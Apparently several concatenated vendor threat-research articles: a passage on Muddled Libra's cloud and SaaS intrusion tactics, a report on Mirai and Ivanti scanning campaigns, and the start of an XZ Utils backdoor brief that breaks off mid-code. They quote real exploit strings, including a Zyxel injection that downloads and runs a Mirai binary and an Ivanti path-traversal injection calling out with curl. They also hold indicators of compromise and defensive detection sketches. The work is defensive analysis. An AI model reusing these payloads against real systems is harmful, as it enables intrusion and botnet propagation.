The Okta cross-tenant impersonation attacks that occurred from late July to early August 2023, in which Muddled Libra bypassed IAM restrictions, show how the group exploits Okta to access SaaS applications and an organization's various CSP environments. They accessed an organization’s Okta Identity Portal through technology administrator accounts that the group compromised as part of their new tactic of help desk social engineering. Then they modified the permission sets of the compromised users, escalating their privileges to gain further access to SaaS applications and the organization's CSP environments.

Muddled Libra also added identity providers with impersonation privileges, which allowed them to access additional applications while impersonating other user accounts. The Conclusion section includes recommendations for Identity Portal hardening.

Accessing SaaS Applications

After gaining access to an environment, Muddled Libra uses the information obtained during reconnaissance to perform discovery internally to find the sign-in pages for SaaS applications. Organizations using single-sign-on (SSO) portals to manage application access (such as Okta) are of particular interest. Figure 2 maps the lateral movement techniques used by Muddled Libra.

Image 2. Lateral movement. Exploiting admin credentials to access SSO portals for quick access to SaaS applications and organizations CSP environments. Utilize unique credentials found in other parts of the environment to access CSP.
Figure 2. Muddled Libra’s lateral movement steps.

The SSO portal of a technology administrator will have an organization’s security information and event management (SIEM), endpoint detection and response (EDR) and password management system (PMS) listed. These administration tools are all of interest to the attackers because they can execute permission modification and identity provider configuration changes. SSO portals also allow them to quickly iterate through applications to find those that would benefit their campaign.

The SaaS Application Exploits section below expands on this activity.

Accessing an Organization’s Cloud Service Provider Environments

How attackers access organizations' different CSP environments depends on their unique configurations. The Muddled Libra group takes advantage of any authentication method to gain access to an organization's cloud network, most commonly organizations’ AWS and Azure environments.

Similar to the activity we described with attackers accessing SaaS applications, if SSO is integrated with an organization’s CSP, attackers use this functionality to gain access to those CSP environments. If SSO is not configured, the group performs discovery across an organization's environment to uncover CSP credentials stored in unsecured locations due to poor technology hygiene.

SaaS Application Exploits

When reviewing common SaaS application exploits, attacker activity falls under three categories:

  • Finding relevant data
  • Locating credentials
  • Modifying SaaS application configuration

Figure 3 fits these activities under discovery in the MITRE ATT&CK framework.

Image 3. Discovery — SaaS. Utilize SaaS applications to locate sensitive information and credentials.
Figure 3. Muddled Libra’s discovery techniques using SaaS.

Depending on the type of SaaS application, the data within the application might be more beneficial for use by threat actors in traditional data exfiltration or for learning about a target’s environment configuration. Historically, Muddled Libra looks for data that falls under either of these classifications within any SaaS application they compromise. They also make a large effort to search for other credentials within a SaaS application.

Sensitive credentials can be exposed in logs, as well as within PMS applications and SaaS applications that scan for sensitive information. Muddled Libra methodically searches for applications that might store this type of valuable information to then use later on in their attacks for privilege escalation and lateral movement.

Microsoft provides a wide range of services and tools that become key targets during an attack due to their high value to both organizations and threat actors. An example of how Muddled Libra takes advantage of a SaaS application is how the group exploits Microsoft SharePoint.

The SharePoint platform is used by organizations to store files that document network topology, as well as what tools an organization uses and other general information. Muddled Libra targets this platform to gain a better understanding of the network configuration within a company and which tools they can exploit, such as remote access tools.

As with any file storage tool, other sensitive information (such as passwords) can also get leaked from these documents. Also, within the Microsoft 365 (M365) suite, the group targets email boxes and other email functionality to gain access to sensitive data.

CSP Reconnaissance and Gathering Intel

A large portion of Muddled Libra’s campaigns involve gathering intelligence and data. Attackers then use this to generate new vectors for lateral movement within an environment. Organizations store a variety of data within their unique CSP environments, thus making these centralized locations a prime target for Muddled Libra. Figure 4 itemizes these discovery tactics.

Image 4. Discovery — AWS. Inventory of users, access, keys, and identity provider connections. Gather sensitive information stored in AWS Secrets Manager.
Figure 4. Muddled Libra’s discovery techniques using AWS.

AWS Intel Gathering

Muddled Libra targets a wide range of services within an organization’s AWS environment to gather more intel for use later on in the attack. These services include AWS IAM, Amazon Simple Storage Service (S3) and AWS Secrets Manager.

The IAM service provides the following information:

  • Which users exist within the AWS account
  • Access keys associated with users
  • What identity provider connections exist

Some AWS IAM API calls that can be used for reconnaissance include:

The first three – listing users, groups and roles – provide the threat actors with high-level information about user groups and what unique roles an organization has created to meet their business needs. The rest of the API calls return information about the following:

  • SSH public keys
  • Service credentials
  • Certificates
  • Various identity providers

The threat actor group wants to learn about these things to broaden their understanding of the environment configuration for the next stages of their attack. None of these API calls return sensitive information associated with the various credentials.
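From a defender's perspective, a burst of these enumeration calls from one principal is a useful signal. The following is a minimal sketch, assuming CloudTrail records have already been parsed into Python dictionaries. The function name, the threshold and the selection of IAM operations are illustrative assumptions (the operations are real IAM API names, but this exact set does not come from the article).

```python
from collections import defaultdict

# Illustrative selection of IAM list operations (an assumption, not the
# article's own list): users, groups, roles, keys, credentials, certificates
# and identity providers.
IAM_RECON_EVENTS = {
    "ListUsers", "ListGroups", "ListRoles", "ListSSHPublicKeys",
    "ListServiceSpecificCredentials", "ListSigningCertificates",
    "ListSAMLProviders", "ListOpenIDConnectProviders",
}


def iam_recon_by_principal(records, min_distinct=4):
    """Return {principal ARN: sorted event names} for principals that called
    at least `min_distinct` different IAM enumeration operations."""
    seen = defaultdict(set)
    for rec in records:
        if rec.get("eventSource") != "iam.amazonaws.com":
            continue
        name = rec.get("eventName")
        if name in IAM_RECON_EVENTS:
            arn = rec.get("userIdentity", {}).get("arn", "unknown")
            seen[arn].add(name)
    return {
        arn: sorted(names)
        for arn, names in seen.items()
        if len(names) >= min_distinct
    }
```

The threshold of four distinct operations is arbitrary. In practice it would need tuning against the normal behavior of administrators and automation in the account.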

Amazon S3 is an AWS object-level storage service whose buckets can contain any sort of data, depending on the organization. Because of this, Muddled Libra spends time listing available buckets and then reviewing bucket data more closely depending on the relevance of the bucket names. Some reconnaissance AWS S3 API calls include ListBuckets and various GetBucket* operations.

Secrets Manager can store sensitive secrets, so this service is especially interesting for the group to use for lateral movement to other applications within the environment. While native cloud credentials cannot be discovered or enumerated using cloud APIs, legacy technologies such as SQL databases running within a cloud environment typically require credentials such as usernames and passwords. Secrets Manager is designed to store such secrets, and also has features for automatically rotating them periodically.

Some reconnaissance AWS Secrets Manager API calls include:

The GetSecretValue event specifically returns the data stored within a secret. This helps the group move laterally to other applications if the secret contains credentials.
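Because GetSecretValue is the call that actually returns secret contents, one way to watch for this activity is to count how many distinct secrets each principal reads. The sketch below assumes CloudTrail records parsed into dictionaries and assumes the secret identifier is available under requestParameters.secretId. The function name and threshold are hypothetical.

```python
from collections import defaultdict


def secrets_read_by_principal(records, max_distinct=3):
    """Return {principal ARN: number of distinct secrets read} for principals
    whose GetSecretValue calls touched more than `max_distinct` secrets."""
    reads = defaultdict(set)
    for rec in records:
        if rec.get("eventSource") != "secretsmanager.amazonaws.com":
            continue
        if rec.get("eventName") != "GetSecretValue":
            continue
        arn = rec.get("userIdentity", {}).get("arn", "unknown")
        # requestParameters can be null in some records, hence the fallback.
        secret_id = (rec.get("requestParameters") or {}).get("secretId", "unknown")
        reads[arn].add(secret_id)
    return {arn: len(ids) for arn, ids in reads.items() if len(ids) > max_distinct}
```

An application role that normally reads one or two secrets and suddenly reads many would stand out in this output, although the right threshold depends on the workload.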

Azure Intel Gathering

To collect sensitive data and network configuration details within Azure, Muddled Libra focuses on storage account access keys and resource groups. Storage account access keys provide access to an Azure storage account, allowing Muddled Libra to iterate through resources such as Azure Blob Storage and Azure Files to locate the most valuable data relevant to their attack.

Both Azure Blob and Azure Files provide organizations with unique storage offerings built for a variety of data types. Figure 5 highlights the group’s discovery tactics using Azure.

Image 5. Discovery — Azure. Collect sensitive information from Azure blob and Azure files storage. Locate valuable targets from Azure resource groups.
Figure 5. Muddled Libra’s discovery techniques using Azure.

Azure resource groups are logical containers used to batch resources together. By simply learning the names of the various resource groups, threat actors can figure out which resource groups contain the most valuable virtual machines (VMs) that might contain sensitive data. The Figure 6 diagram shows what these resource groups potentially encompass that might be of interest to the threat actors.

Image 6 is a tree diagram of a resource group with attacker targets highlighted. The resource group is at the top. Stemming from it are blobs, virtual machine scale sets, virtual machines, and public IP addresses.
Figure 6. Resource group with various attacker targets.

CSP Data Exfiltration Techniques

Muddled Libra leverages legitimate CSP services and features to more quickly and efficiently exfiltrate data. These components exist for organizations to better manage their workloads and simplify their processes, but as with many tools, threat actors can use those same services to accomplish their malicious goals.

AWS Exfiltration Techniques

When it comes to exfiltrating data from an organization's AWS environment, Muddled Libra targets two legitimate AWS services to quickly move data. The group uses both AWS DataSync and AWS Transfer to move data from an on-premises environment to the cloud and then from the cloud to an external entity.

AWS DataSync enables the transfer of data from on-premises to various AWS storage services. The AWS Transfer service enables data transfer to and from various AWS storage services. Figure 7 highlights these exfiltration tactics.

Image 7. Exfiltration – AWS. Exploit AWS DataSync and AWS transfer services.
Figure 7. Muddled Libra’s exfiltration techniques using AWS.

By using these services in tandem, Muddled Libra can move data very quickly out of an environment. When a new AWS Transfer server gets created, the following AWS API events appear in the CloudTrail logs:

An AWS Transfer user is specifically created as part of the host creation, so the CreateUser event is associated with transfer.amazonaws.com as the event source. To protect against this activity, organizations can use the AWS IAM Access Analyzer to gauge the permissiveness of resources and lock down credentials to follow the principle of least privilege. In addition to limiting IAM permissions, organizations can use AWS Service Control Policies (SCP) to completely block services an organization doesn’t use such as DataSync or AWS Transfer, regardless of the permissions associated with a principal.
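As an illustration of the SCP approach, the sketch below builds a deny policy for the two services discussed here. It assumes the organization uses neither service. The function name and the Sid value are hypothetical, and the policy would still need to be attached to the appropriate organizational unit through AWS Organizations.

```python
import json


def build_deny_scp(service_prefixes):
    """Build an SCP document that denies every action in the given services,
    regardless of the IAM permissions attached to a principal."""
    return {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Sid": "DenyUnusedDataMovementServices",  # hypothetical label
                "Effect": "Deny",
                "Action": [f"{prefix}:*" for prefix in service_prefixes],
                "Resource": "*",
            }
        ],
    }


# "datasync" and "transfer" are the IAM service prefixes for AWS DataSync
# and AWS Transfer.
policy = build_deny_scp(["datasync", "transfer"])
print(json.dumps(policy, indent=2))
```

Generating the document from a list keeps the denied services easy to review and extend. Organizations that do use one of these services would need a narrower statement instead of a blanket deny.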

Azure Exfiltration Techniques

One method of data exfiltration that threat actors use in Azure abuses standard VM functionality known as snapshots to take images of hosts that contain sensitive information pertinent to Muddled Libra’s attack objectives. Snapshots allow users to take a point-in-time image of a virtual hard disk (VHD).

CSPs have restrictions in place regarding sharing snapshot resources with external entities. Muddled Libra avoids this by creating new VMs within the compromised environment and then saving the relevant operational data from the snapshots to the newly created hosts for staging before exfiltrating the data. Figure 8 lists these collection and exfiltration techniques.

Image 8. Collection. Exfiltration — Azure. Create snapshots of sensitive hosts. Create new virtual machines.
Figure 8. Muddled Libra’s collection and exfiltration techniques using Azure.

Once the data exists on the newly created VMs, threat actors can exfiltrate the data via traditional network exfiltration techniques.

Conclusion

By expanding its tactics to include SaaS applications and cloud environments, Muddled Libra demonstrates the multidimensionality of cyberattacks in the modern threat landscape. The use of cloud environments to gather large amounts of information and quickly exfiltrate it poses new challenges to defenders. Figure 9 displays the full attack chain used by Muddled Libra when targeting SaaS applications and organizations' CSP environments.

Image 9 is a list of all of the MITRE ATT&CK steps used by Muddled Libra when targeting CSPs.
Figure 9. Muddled Libra attack chain in the cloud.

Identity portals provide a great starting point for centralizing credential management, reducing administrative overhead and improving the end-user experience, but this also makes them prime targets for attackers. These platforms must be protected with robust and difficult-to-bypass secondary authentication factors such as hardware tokens or biometrics, and they should be closely monitored for unusual activity.

To protect CSP identities, defenders can use AWS IAM roles and Microsoft Entra Privileged Identity Management (PIM) to limit the long-term access attackers can gain, forcing attackers to reauthenticate more often. This limitation adds another layer of complexity to the threat actor’s attack, and the reauthentication process creates more abnormal, detectable events for defenders.

Despite Muddled Libra’s constantly changing attack tactics, defenders can build better protections by understanding the end goal of these threat actors and then implementing and improving the technology protections that safeguard their environments.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through Prisma Cloud, which provides detection, alerting and mitigation operations across several components within multicloud and hybrid environments.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Updated April 10, 2024, at 7:37 a.m. PT to correct language in Figures 8 and 9.

It Was Not Me! Malware-Initiated Vulnerability Scanning Is on the Rise

Executive Summary

Our telemetry indicates a growing number of threat actors are turning to malware-initiated scanning attacks. This article reviews how attackers use infected hosts for malware-based scans of their targets instead of the more traditional approach using direct scans.

Threat actors have long used scanning to pinpoint vulnerabilities in networks or systems. Some scanning attacks originate from benign networks and are likely driven by malware on infected machines. By launching scanning attacks from compromised hosts, attackers can accomplish the following:

  • Cover their traces
  • Bypass geofencing
  • Expand botnets
  • Leverage the resources of these compromised devices to generate a higher volume of scanning requests than they could achieve using only their own devices

We identified several prominent characteristics of scanning behavior, such as an unusually high volume of requests. Using these characteristics and the signatures of known threats, we are able to detect known cases as well as emerging new scanning patterns.

Palo Alto Networks customers receive protection against malicious scanning activity through our Next-Generation Firewall and Prisma SASE with Cloud-Delivered Security Services enabled, including Advanced URL Filtering, Advanced Threat Prevention, Advanced WildFire and DNS Security.

The Prisma Cloud WAAS module helps protect cloud-native web applications and API endpoints from scanning attacks.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Ivanti, Mirai

Introduction to Scanning Attacks

Scanning occurs when an attacker initiates network requests in an attempt to exploit the potential vulnerabilities of the target hosts. The target hosts are typically benign and potentially vulnerable to the CVE targeted by the attacker.

Commonly seen scanning behaviors include the following:

  • Port scanning
  • Vulnerability scanning
  • OS fingerprinting

In Figure 1, we depict an attack model of a simple direct incident of attacker scanning. In this model, the attacker makes an HTTP POST request (as described in our MOVEit-related threat brief) to the fictional random-university[.]edu in an attempt to scan for and subsequently exploit the MOVEit vulnerability CVE-2023-34362. If random-university[.]edu is vulnerable to this CVE and there is no other protection mechanism employed, this attack would succeed.

Image 1 is a diagram of how direct attacker scanning works. The attacker sends an HTTP POST request to the target host.
Figure 1. Direct attacker scanning.

Multi-Network Monitoring Reveals Emerging Scanning Patterns

By tracking traffic logs from multiple networks, we see requests to a high number of destinations with seemingly benign paths. For example, our telemetry indicates that URLs ending with guestaccess.aspx have been requested 7,147 times in 2023 by at least 1,406 devices. This endpoint is tied to the MOVEit vulnerability CVE-2023-34362, which was published on June 2, 2023.

When we review our historic data, we observe this endpoint in our telemetry with different destination websites even before the CVE publish date. After reviewing our telemetry from multiple networks, we detected over 66 million requests in 2023 that were potentially associated with scanning activity.
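The core of this observation is that the same path shows up across many unrelated destinations and from many devices. A minimal sketch of that grouping follows, assuming each log entry is a (source device, full URL) pair. The function name, the thresholds and the choice to key on the final path segment are assumptions for illustration, not a description of our detection pipeline.

```python
from collections import defaultdict
from urllib.parse import urlsplit


def find_scan_candidates(log_entries, min_destinations=3, min_sources=2):
    """Group requests by the final path segment and return
    {segment: (distinct destinations, distinct sources)} for segments
    requested on many destinations by several devices."""
    destinations = defaultdict(set)
    sources = defaultdict(set)
    for source_device, url in log_entries:
        parts = urlsplit(url)
        segment = parts.path.rstrip("/").rsplit("/", 1)[-1].lower()
        if not segment:
            continue  # request for the site root, nothing to group on
        destinations[segment].add(parts.hostname)
        sources[segment].add(source_device)
    return {
        segment: (len(destinations[segment]), len(sources[segment]))
        for segment in destinations
        if len(destinations[segment]) >= min_destinations
        and len(sources[segment]) >= min_sources
    }
```

On real traffic, common benign files such as index pages would also cross these thresholds, so a sketch like this would need a baseline of popular paths and much higher thresholds before its output is meaningful.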

Scanning Attacks With New URLs for Payload Delivery or C2

We observed many scanning cases where attackers embedded previously unseen URLs for payload delivery or C2 in the exploit request. Using new URLs reduces the chance that security vendors have already blocked them. Because these payload delivery or C2 URLs are new to security vendors and subsequent requests to them are unlikely to be blocked, it is crucial to detect and block the initial scanning requests.

On Jan. 12, 2024, 11:23:49 UTC, we detected scanning by a Mirai variant with the following malicious URL in its payload:

  • 103.245.236[.]188/skyljne.mips

On Jan. 18, 2024, 07:31:07 UTC, we detected scanning that attempted to exploit the Ivanti vulnerabilities with the following malicious URL in its payload:

  • 45.130.22[.]219/ivanti.js

In both of the above instances, we observed that the scanning requests preceded the detection of subsequent malicious payload delivery or C2 URLs by a significant margin. This indicates the effectiveness of scanning detection in identifying and responding to emerging threats promptly by both blocking scanning activities and identifying malicious URLs.

Malware Hijacks Infected Devices To Launch Scanning Attacks

By analyzing our telemetry, we discovered a threat model for malware-driven scanning attacks. In this model, attackers infect a device and use its resources to perform scanning.

Typically, once a device gets compromised by malware, this malware beacons to attacker-controlled C2 domains for instructions. Threat actors can instruct the malware to perform scanning attacks. Then, the malware on the compromised device initiates scanning requests to various target domains.

For example, assume a host gets infected by a Mirai variant (SHA256: 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14). Then, the Mirai variant will connect to its C2 server at 193.47.61[.]75, where it will receive the instruction to start scanning.

After receiving this instruction, the threat will initiate scanning requests to various targets using the infected device’s resources. Figure 2 depicts a simple threat model for malware-driven scanning. The ideal outcome for the attacker is to find and exploit vulnerable targets.

Image 2 is a diagram of malware-driven scanning. The infected host scans and exploits two targeted hosts. A beacon goes to and from the command and control domain and the infected host.
Figure 2. Malware-driven scanning.

Depending on the type of attack planned by the threat actor, the targets can vary. For example, an attacker might be targeting a certain entity such as a government. In this case, the attacker is likely to make exploit attempts with multiple CVEs that apply only to that government’s website.

An attacker might also be trying to exploit as many websites as they can for various purposes such as spreading a botnet. In that case, the attacker would broaden their scope to a variety of different targets.

We’ll now discuss a case study from our analysis that fits this threat model.

Mirai Botnet Keeps Enriching Its Tool Set for Propagation

Our telemetry reflects attempted exploits for a Zyxel remote code execution vulnerability that we previously reported in 2023 for a Mirai variant. The exploit targets the insufficient input validation vulnerability that existed in certain versions of the Zyxel router’s /bin/zhttpd/ component to download a malicious file, which will then start to replicate itself for further propagation of the Mirai botnet.

On June 19, 2023, we observed an unusual spike in the number of unique destinations scanned where at least 2,247 devices were involved in a distributed exploit attempt on 15,812 destination internet service providers (ISPs). In Figure 3, we show the number of unique scanned targets for this vulnerability over a 23-day period with the URL pattern:

bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}*;${ifs}wget${ifs}hxxp://103.110.33[.]164/mips;${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;.

Of note, 103.110.33[.]164 in the above pattern is only an example. This URL pattern is not limited to a single IP address, and we discovered several others in the results indicated below in Figure 3.
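Since the payload host varies, matching on the structure of the request rather than on a single IP address is more durable. The following sketch is one way to do that with a regular expression. The pattern and function name are assumptions written for this illustration, and the pattern accepts both the defanged form shown above and a live http:// form.

```python
import re

# Matches the Zyxel exploit path structure shown above and captures whatever
# host the wget command points at, instead of hard-coding one IP address.
ZYXEL_SCAN_PATTERN = re.compile(
    r"bin/zhttpd/\$\{ifs\}.*?wget\$\{ifs\}h(?:xx|tt)p://(?P<host>[^/;]+)/[^;]*;"
    r".*?zyxel\.selfrep",
    re.IGNORECASE,
)


def extract_payload_host(url_path):
    """Return the payload host embedded in a matching request path,
    or None if the path does not follow the exploit pattern."""
    match = ZYXEL_SCAN_PATTERN.search(url_path)
    return match.group("host") if match else None


sample = (
    "bin/zhttpd/${ifs}cd${ifs}/tmp;${ifs}rm${ifs}-rf${ifs}*;"
    "${ifs}wget${ifs}hxxp://103.110.33[.]164/mips;"
    "${ifs}chmod${ifs}777${ifs}mips;${ifs}./mips${ifs}zyxel.selfrep;"
)
print(extract_payload_host(sample))
```

Real requests may be URL-encoded or use other shell separators, so this pattern should be treated as a starting point and not as complete coverage.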

Image 3 is a column diagram of the count of unique scanned targets for the Zyxel vulnerability. The graph starts June 9, 2023 and ends July 1, 2023. The majority of the dates average at about 1500. Two significant peaks are June 19, 2023 and June 20, 2023. The counts for these dates are 15,812 and 13,409, respectively.
Figure 3. Number of unique scanned targets for Zyxel vulnerability by date.

Mirai botnets are continuously evolving and incorporating new vulnerabilities into their repertoire for exploitation. As new vulnerabilities are announced, threat actors develop new Mirai variants to exploit these vulnerabilities.

To stay ahead of this cycle, the most crucial defense is to patch vulnerabilities and update detection systems so that they can identify and block new Mirai variants. Given the constant announcements of new vulnerabilities, it is particularly challenging to perform these detections and updates promptly. However, by monitoring scanning activities across multiple networks, we can possibly detect new scanning patterns more rapidly.

Ivanti Vulnerability Scanning Spikes for a Week After Disclosure

We detected the following recently disclosed Ivanti vulnerabilities in our telemetry:

  • CVE-2023-46805 (high severity authentication bypass)
  • CVE-2024-21887 (critical severity command injection)
  • CVE-2024-21893 (high severity server-side request forgery)

More details on these vulnerabilities can be found in the Unit 42 Ivanti threat brief.

Figure 4 shows that we observed a spike in the number of unique targets scanned starting on Jan. 14, 2024, with various URL paths that threat actors used to scan and exploit the Ivanti vulnerabilities. On this day, 25,268 unique hosts were scanned by at least 15,645 infected hosts. Only four days after the initial spike, on Jan. 18, 2024, these numbers jumped. We then observed 82,441 unique hosts being scanned by at least 39,658 infected hosts.

Image 4 is a column diagram of the count of unique scanned targets for the Ivanti vulnerability. The graph starts January 7, 2024 and ends January 21, 2024. The counts rise starting January 14, 2024 with a peak of 84,824 on January 18, 2024. The count then dips drastically down to 6,633 and then begins to peter out.
Figure 4. Number of unique scanned hosts targeting Ivanti vulnerabilities by date.

On Jan. 19, we observed requests from at least 32 infected hosts to 37 unique victim hosts with the following URL path:

  • api/v1/totp/license/keys-status/;curl a0f0b2e6[.]dnslog[.]store

This was a chained attack where the threat actors leveraged CVE-2023-46805 and CVE-2024-21887. Here, the /license/keys-status endpoint was protected by authentication, but it had a command injection vulnerability.

To bypass the authentication, attackers leveraged path traversal and sent the following HTTP GET request:

  • /api/v1/totp/user-backup-code/../../license/keys-status;<attacker_cmd>

Because the /api/v1/totp/user-backup-code endpoint performed only a prefix check on URLs, this GET request could bypass the authentication and access the endpoint that had the command injection vulnerability.
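The weakness of a prefix-only check can be shown with a small sketch. This is not Ivanti's code. The allowlist, the function names and the normalization step are assumptions used only to illustrate why checking the raw path differs from checking the resolved path.

```python
import posixpath

# Hypothetical allowlist of endpoints reachable without authentication.
UNAUTHENTICATED_PREFIXES = ("/api/v1/totp/user-backup-code",)


def naive_is_unauthenticated(path):
    """Prefix check on the raw path, which ignores '..' segments."""
    return path.startswith(UNAUTHENTICATED_PREFIXES)


def normalized_is_unauthenticated(path):
    """Resolve '..' segments first, then require an exact or child match."""
    resolved = posixpath.normpath(path)
    return any(
        resolved == prefix or resolved.startswith(prefix + "/")
        for prefix in UNAUTHENTICATED_PREFIXES
    )


request_path = "/api/v1/totp/user-backup-code/../../license/keys-status"
print(naive_is_unauthenticated(request_path))       # raw prefix matches
print(normalized_is_unauthenticated(request_path))  # resolved path does not
print(posixpath.normpath(request_path))
```

The naive check accepts the request because the string begins with the allowed prefix, while the resolved path points at a different endpoint entirely. Checking the path only after normalization closes that gap in this simplified model.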

In the example we observed, the threat actor attempted to perform this chain attack and connect to a0f0b2e6[.]dnslog[.]store. Attackers use this domain to collect the IP addresses of vulnerable targets to potentially perform further attacks.

Categories of Vulnerability Scans

Vulnerabilities in routers, web application development/testing frameworks and collaboration tools such as email and calendar are popular with attackers due to their widespread usage. Figure 5 shows the technology stack attackers are most likely to target based on our telemetry.

Image 5 is a pie chart of the categories of the top targeted entities. Collaboration, web development framework, and router are almost evenly split at 32.1%, 31.6%, and 35.2%, respectively. Operating system came in at 1%.
Figure 5. Technology stack targeted by attackers.

Router attacks in particular have been exceedingly popular among attackers. In recent incidents, Russian hackers attempted to hijack Ubiquiti EdgeRouters and a Chinese SOHO botnet has targeted Cisco and NetGear routers. Our data indicates that vulnerability scans are not limited to these particular brands of routers.

Conclusion

Our telemetry indicates a significant number of malware-initiated scans among the scanning attacks we detected in 2023. Malware-initiated scans are a less-direct form of scanning compared to the more straightforward approach traditionally seen with attacker scans.

Our data also reveals other trends in scanning related to various vulnerabilities that appeared in 2023. These findings indicate that commonly targeted vulnerabilities are those with a higher probability of affecting a wide range of targets.

This data underscores the importance of proactive monitoring and defense mechanisms against scanning.

Palo Alto Networks customers benefit from our Next-Generation Firewall and Prisma SASE with Cloud-Delivered Security Services, including Advanced URL (AURL) Filtering, Advanced Threat Prevention, Advanced WildFire and DNS Security.

In particular, AURL Filtering offers robust protection against the evolving landscape of scanning attacks. Specifically, our AURL customers can block the scanning behavior described by simply blocking the Scanning Activity category.

Also, the Prisma Cloud WAAS module helps protect cloud-native web applications and API endpoints from scanning attacks.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

IP addresses/URLs/SHAs that have hosted Mirai malware

  • 45.66.230[.]32
  • 85.208.139[.]73
  • 87.120.88[.]13
  • 95.214.27[.]244
  • 103.110.33[.]164
  • 103.95.196[.]149
  • 103.131.57[.]59/mips
  • 103.212.81[.]116
  • 103.228.126[.]17
  • 145.40.126[.]81/mips
  • 146.19.191[.]85
  • 146.19.191[.]108
  • 176.97.210[.]211/mips
  • 185.112.83[.]15
  • 193.31.28[.]13
  • 193.47.61[.]75
  • 217.114.43[.]149
  • 23190d722ba3fe97d859bd9b086ff33a14ae9aecfc8a2c3427623f93de3d3b14

Domain and URL associated with Ivanti vulnerability scans

  • dnslog[.]store
  • hxxp://45.130.22[.]219/ivanti.js
  • 137.220.130[.]2/doc

Acknowledgements

We would like to thank the Unit 42 team for supporting us with this post. Special thanks to Bradley Duncan and Lysa Myers for their invaluable input on this article.

Threat Brief: Vulnerability in XZ Utils Data Compression Library Impacting Multiple Linux Distributions (CVE-2024-3094)

Executive Summary

On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the versions 5.6.0 and 5.6.1 of XZ Utils. XZ Utils is data compression software included in major Linux distributions. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has advised people to downgrade to an uncompromised XZ Utils version (earlier than 5.6.0).

The newly disclosed vulnerability has been assigned the following CVE:

CVE Number: CVE-2024-3094
Description: Malicious code was discovered in the upstream tarballs of xz, starting with version 5.6.0. Through a series of complex obfuscations, the liblzma build process extracts a prebuilt object file from a disguised test file existing in the source code, which is then used to modify specific functions in the liblzma code. This results in a modified liblzma library that can be used by any software linked against this library, intercepting and modifying the data interaction with this library.
CVSS Severity: 10.0 Critical

Palo Alto Networks customers are better protected from and can implement mitigations for CVE-2024-3094 in the following ways:

  • The Next-Generation Firewall with cloud-delivered security services including Advanced WildFire detects the compromised versions described in this report as malicious, as well as features known to be associated with the backdoors.
  • Cortex XDR and XSIAM help protect against post-exploitation activities using the multi-layer protection approach. Cortex customers using the Host Insights module can detect if the vulnerability exists on protected devices.
  • Prisma Cloud has out-of-the-box detection capabilities in place that will help prevent the launch of images with CVE-2024-3094.
  • The Unit 42 Managed Threat Hunting team is monitoring attempted malicious activities against our customers. Cortex XDR customers can also use the XQL queries shared in the Unit 42 Managed Threat Hunting Queries section below to search for affected versions of XZ Utils.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Details of CVE-2024-3094

On March 28, 2024, Red Hat Linux announced CVE-2024-3094 with a critical CVSS score of 10. This vulnerability is a result of a supply chain compromise impacting the latest versions of XZ tools and libraries. XZ Utils is data compression software included in major Linux distributions.

Versions 5.6.0 and 5.6.1 of the libraries contain malicious code that modifies functions during the liblzma build process. Liblzma is a data compression library.

This malicious code results in a compromised liblzma library, which may modify or intercept data from other applications that leverage the library. Under certain conditions this code may allow unauthorized access to affected systems.

A security researcher, Andres Freund, found the malicious code after noticing that failing SSH logins were consuming unusually high CPU. While investigating the high CPU utilization, he also noticed slower logins, which led to further exploration and discovery of the vulnerability.

Affected Versions and Mitigation Actions

All major Linux distros recommend either reverting back to versions built prior to the inclusion of XZ Utils 5.6.0 and 5.6.1 or migrating to updated releases.

Please check the notification page for your specific distribution for additional updates and guidance.

Distro: Affected Version

  • Red Hat: Fedora Linux 40 and Fedora Rawhide
  • Debian: No Debian stable versions are known to be affected. Compromised packages were part of the Debian testing, unstable and experimental distributions, with versions ranging from 5.5.1alpha-0.1 (uploaded on 2024-02-01), up to and including 5.6.1-1.
  • Kali: The impact of this vulnerability affected Kali between March 26-29. If you updated your Kali installation on or after March 26, it is crucial to apply the latest updates today to address this issue. However, if you did not update your Kali installation before March 26, you are not affected by this backdoor vulnerability.
  • OpenSUSE: OpenSUSE Tumbleweed and OpenSUSE Micro OS between March 7th and March 28th 2024.
  • Alpine: 5.6 versions prior to 5.6.1-r2
  • Arch: Installation medium 2024.03.01; virtual machine images 20240301.218094 and 20240315.221711; container images created between and including 2024-02-24 and 2024-03-28

Additionally, the Homebrew package manager is forcing downgrades to 5.4.6. Its maintainers do not believe Homebrew’s builds were compromised but are taking this action as a precaution.

Amazon has stated that Amazon Linux customers are not affected by this issue, and no action is required.
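For a quick triage of a version string, the upstream versions named above (5.6.0 and 5.6.1) can be checked with a few lines of Python. This is a rough sketch with a hypothetical function name. It assumes the input is text such as the output of xz --version or a package listing, and it compares only the upstream version number. Distribution package revisions, such as the Debian range or the fixed Alpine 5.6.1-r2 build listed above, are not handled and still require the distribution's advisory.

```python
import re

# Upstream XZ Utils releases that contain the malicious code.
COMPROMISED_UPSTREAM_VERSIONS = {"5.6.0", "5.6.1"}


def is_compromised_xz(version_text):
    """Return True if the first x.y.z version number found in the text is one
    of the compromised upstream releases."""
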